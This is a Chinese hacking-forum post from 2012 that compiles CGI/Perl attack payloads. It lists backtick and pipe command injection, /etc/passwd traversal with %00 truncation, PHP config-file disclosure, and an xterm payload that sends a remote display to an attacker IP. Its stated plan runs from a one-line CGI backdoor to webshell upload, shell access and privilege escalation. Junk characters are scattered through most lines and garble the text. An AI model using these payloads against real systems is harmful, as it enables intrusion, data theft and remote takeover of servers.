找回密码
 立即注册
中国网络渗透测试联盟»论坛 --==渗透测试区{ Penetration testing area }==-- web app渗透测试::『Web App penetration testing』 CGI资料整理
返回列表 发新帖
查看: 3416|回复: 0
打印 上一主题 下一主题

CGI资料整理

[复制链接]
admin
跳转到指定楼层
楼主
发表于 2012-9-13 16:56:16 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
总体思路,跳过限制,查看敏感文件和密码相关文件。写入一句话cgi,进后台试传webshell(后台如果加验证或者MD5过的时候,可以试着  / s7 o8 f8 n3 @2 v8 Z2 v7 A5 E
cookies欺骗,本地提交),寻找可执行的目录和相关函数,拿shell…………》提权  
8 L3 _/ ~, C% T5 A2 h感谢EMM和ps的睿智和他们高超的脚本技术,还有以前老红4的脚本群英和国外的那些牛淫们  
; V) \* @4 j, Y% L' i. O; u注“  " E  i8 N) \! j
perl脚本的漏洞大多出在open()、system()或者 ’’调用中。前者允许读写和执行,而后两个允许执行。  + i7 N! H# g8 ]% Y; n
以POST的方法发送表格的话,就不能蒙混过关(%00将不会被解析),所以我们大部分用GET  : v# C5 c, V" `  A4 j
2 T3 I( J: ]/ S
http://target.com/cgi-bin/home/news/sub.pl?12 随意构造  
/ d1 \5 {+ ~, f9 yhttp://target.com/cgi-bin/home/news/sub.pl?& 换个字符,也许可以执行呢  . R0 ?7 u* _; s& s
http://target.com/cgi-bin/home/news/sub.pl?`ls` 单引号  , ]( E. G. E; t+ Q, ?1 a. T
http://target.com/cgi-bin/home/news/sub.pl?`id`  
, ^" g3 }, ?/ s' B+ Bhttp://target.com/cgi-bin/home/news/sub.pl?`IFS=!;uname!-a`  8 F- H% [( \0 `4 z/ N$ Y# r
http://target.com/cgi-bin/home/news/sub.pl?`cat<’/home1/siteadm/cgi-bin/home/news/sub.pl’` 非常好的思路,把代码cat回来显示  ; S$ f7 H0 _9 Z# B- u% ?
7 e% M  O; w# q" ?" p7 V
http://target.com/test.pl;ls|  
8 Q+ G: J4 q. A9 Shttp://target.com/index.cgi?page=|ls+-la+/%0aid%0awhich+xterm|  
; d, ^9 ~2 j- R+ k5 _5 Khttp://target.com/index.cgi?page=|xterm+-isplay+10.0.1.21:0.0+%26|  
8 |8 h) d: b3 Ohttp://target.com/test.pl?’id’ 类似’’内的操作和命令执行自己构造  ! B# n) q# S8 j6 U
比如:cat<’/home1/siteadm/cgi-bin/home/news/test.pl’` 把pl代码显示出来。  , V. [- e2 |4 o+ o) u' B/ @
http://target.com/index.cgi?page=;dir+c:\|&cid=03417 类似asp的Sql injection  6 g4 ?& l" r9 K" ?! u
; }, S/ o6 p4 T* l
http://target.com/test.pl?&........ /../../etc/passwd  2 s. c1 v* ]$ ~/ X
! c; `8 J3 I$ @/ w
http://www.target.org/cgi-bin/cl ... info.pl?user=./test 前面加./  : f5 M& r# b  X2 o% X( R5 B+ ^
http://www.target.org/cgi-bin/cl ... nfo.pl?user=test%00 注意后面的 %00 别弄丢了  2 g3 ]' u& C1 \- |
http://www.target.org/cgi-bin/cl ... ../../etc/passwd%00  0 }, E# B% j7 _- Z" ^/ Q

5 k" ?8 ~4 c9 r; Fhttp://www.target.org/show.php?f ... /include/config.php 查看php代码  1 _# |( ~6 K3 x  `  F
http://www.target.org/show.php?f ... ng/admin/global.php  
( _+ i) K) |7 k+ z5 ^* ~0 P0 x
: n1 d$ N8 C  L# [( A* femm和ps的一句话/ V6 N/ h7 i$ w* h
  m/ @% \7 o$ V
http://www.target.org/cgi-bin/cl ... /../../../bin/ls%20  % e' n1 a/ c! x7 ?! s

/ [8 ]: a, X8 U1 |$ _: y, f: i$ _# x6 ^>bbb%20|  ! {& e& }9 ]8 r: P3 x: H& s
! o  R( Z* S6 M
http://www.target.org/cgi-bin/club/scripts\’less showpost.pl\’ 并且寻找(用\’/\’)\’Select\’ 字符串  + P% o( @* ?/ }3 f1 D$ x2 Y" [. w2 i. @6 c

  Y& \% H/ b1 d0 U5 O; vhttp://www.target.org/cgi-bin/cl ... bin/sh.elf?ls+/http 这里的是elf是CCS中文linux操作系统特征  * x7 L3 M, ]" E0 @, J4 V
http://www.target.org/csapi/..%c0%afhttp/china.sh”+.elf?”+&+ls+/bin  
- v4 }0 o4 T5 ^; d( h; t  ]  `% c* A. L6 j
相关html为后缀的脚本技术,继续深挖中,但是不可质疑的是提交数据查询语句也是一种完美的方法  
1 b1 {( T2 e8 W0 n- vhttp://target.com/index.html#cmd.exe  ( F# H- B7 W% a
http://target.com/index.html?dummyparam=xp_cmdshell  
, h5 P% C% ~7 zlynx http://target.com/cgi-bin/htmlscript?../../../../etc/passwd  
+ I5 _' B2 K3 L
回复

使用道具 举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Copyright © 2001-2013 Comsenz. All Rights Reserved - Powered by Discuz! X3.2
快速回复 返回顶部 返回列表